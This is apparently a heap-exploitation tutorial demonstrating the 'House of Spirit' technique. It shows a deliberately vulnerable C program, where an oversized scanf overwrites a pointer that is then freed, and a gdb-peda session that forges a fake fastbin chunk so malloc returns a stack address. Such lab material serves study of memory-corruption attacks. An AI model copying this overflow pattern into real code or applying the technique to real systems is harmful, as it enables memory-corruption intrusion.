• spirit
• spirit.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void main(){
	unsigned long *ptr;
	char fakeChunk[160];

	printf("fakeChunk : %p\n",fakeChunk);
	printf("ptr : %p\n",&ptr);

	scanf("%176s",fakeChunk);

	malloc(1000);

	free(ptr);

	char *stack = malloc(0x70);
	char *test1 = malloc(0x70);
	char *test2 = malloc(0x500);

	printf("Stack : %p\n",stack);
}

gdb-peda$ b *0x000000000040067b
Breakpoint 1 at 0x40067b
gdb-peda$ b *0x0000000000400691
Breakpoint 2 at 0x400691
gdb-peda$ b *0x000000000040069b
Breakpoint 3 at 0x40069b

gdb-peda$ r
Starting program: /home/lazenca0x0/Documents/heap/spirit 
fakeChunk : 0x7fffffffe1c0
ptr : 0x7fffffffe260
Breakpoint 1, 0x000000000040067b in main ()
gdb-peda$ x/22gx 0x7fffffffe1c0
0x7fffffffe1c0:	0x0000000000000000	0x0000000000000000
0x7fffffffe1d0:	0x0000000000000000	0x0000000000000000
0x7fffffffe1e0:	0x0000000000000000	0x00007ffff7ffe520
0x7fffffffe1f0:	0x00007fffffffe220	0x00007fffffffe210
0x7fffffffe200:	0x00000000f63d4e2e	0x0000000000400388
0x7fffffffe210:	0x00000000ffffffff	0x00007fffffffe378
0x7fffffffe220:	0x00007ffff7a211f8	0x00007ffff7ff74c0
0x7fffffffe230:	0x00007ffff7ffe1c8	0x0000000000000000
0x7fffffffe240:	0x0000000000000001	0x000000000040071d
0x7fffffffe250:	0x00007fffffffe280	0x0000000000000000
0x7fffffffe260:	0x00000000004006d0	0x0000000000400540
gdb-peda$ ni
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBB

0x0000000000400680 in main ()
gdb-peda$ x/22gx 0x7fffffffe1c0
0x7fffffffe1c0:	0x4141414141414141	0x4141414141414141
0x7fffffffe1d0:	0x4141414141414141	0x4141414141414141
0x7fffffffe1e0:	0x4141414141414141	0x4141414141414141
0x7fffffffe1f0:	0x4141414141414141	0x4141414141414141
0x7fffffffe200:	0x4141414141414141	0x4141414141414141
0x7fffffffe210:	0x4141414141414141	0x4141414141414141
0x7fffffffe220:	0x4141414141414141	0x4141414141414141
0x7fffffffe230:	0x4141414141414141	0x4141414141414141
0x7fffffffe240:	0x4141414141414141	0x4141414141414141
0x7fffffffe250:	0x4141414141414141	0x4141414141414141
0x7fffffffe260:	0x4242424242424242	0x0000000000400500
gdb-peda$ set *0x7fffffffe1c8 = 0x80
gdb-peda$ set *0x7fffffffe1cc = 0x0
gdb-peda$ set *0x7fffffffe248 = 0x10000
gdb-peda$ set *0x7fffffffe24c = 0x0
gdb-peda$ set *0x7fffffffe260 = 0x7fffffffe1d0
gdb-peda$ set *0x7fffffffe264 = 0x7fff
gdb-peda$ x/22gx 0x7fffffffe1c0
0x7fffffffe1c0:	0x4141414141414141	0x0000000000000080
0x7fffffffe1d0:	0x4141414141414141	0x4141414141414141
0x7fffffffe1e0:	0x4141414141414141	0x4141414141414141
0x7fffffffe1f0:	0x4141414141414141	0x4141414141414141
0x7fffffffe200:	0x4141414141414141	0x4141414141414141
0x7fffffffe210:	0x4141414141414141	0x4141414141414141
0x7fffffffe220:	0x4141414141414141	0x4141414141414141
0x7fffffffe230:	0x4141414141414141	0x4141414141414141
0x7fffffffe240:	0x4141414141414141	0x0000000000010000
0x7fffffffe250:	0x4141414141414141	0x4141414141414141
0x7fffffffe260:	0x00007fffffffe1d0	0x0000000000400500
gdb-peda$

Breakpoint 2, 0x0000000000400691 in main ()
gdb-peda$ i r rdi
rdi            0x7fffffffe1d0	0x7fffffffe1d0
gdb-peda$ p main_arena.fastbinsY 
$3 = {0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0}
gdb-peda$ ni


0x0000000000400696 in main ()
gdb-peda$ p main_arena.fastbinsY 
$4 = {0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7fffffffe1c0, 0x0, 0x0, 0x0} 
gdb-peda$ c
Breakpoint 3, 0x000000000040069b in main ()
gdb-peda$ ni
0x00000000004006a0 in main ()
gdb-peda$ i r rax
rax            0x7fffffffe1d0	0x7fffffffe1d0
gdb-peda$ x/16gx 0x7fffffffe1d0
0x7fffffffe1d0:	0x0000000000000000	0x4141414141414141
0x7fffffffe1e0:	0x4141414141414141	0x4141414141414141
0x7fffffffe1f0:	0x4141414141414141	0x4141414141414141
0x7fffffffe200:	0x4141414141414141	0x4141414141414141
0x7fffffffe210:	0x4141414141414141	0x4141414141414141
0x7fffffffe220:	0x4141414141414141	0x4141414141414141
0x7fffffffe230:	0x4141414141414141	0x4141414141414141
0x7fffffffe240:	0x4141414141414141	0x0000000000010000
gdb-peda$ p main_arena.fastbinsY 
$2 = {0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0}
gdb-peda$ ni
...
gdb-peda$ i r rax
rax            0x602400	0x602400
gdb-peda$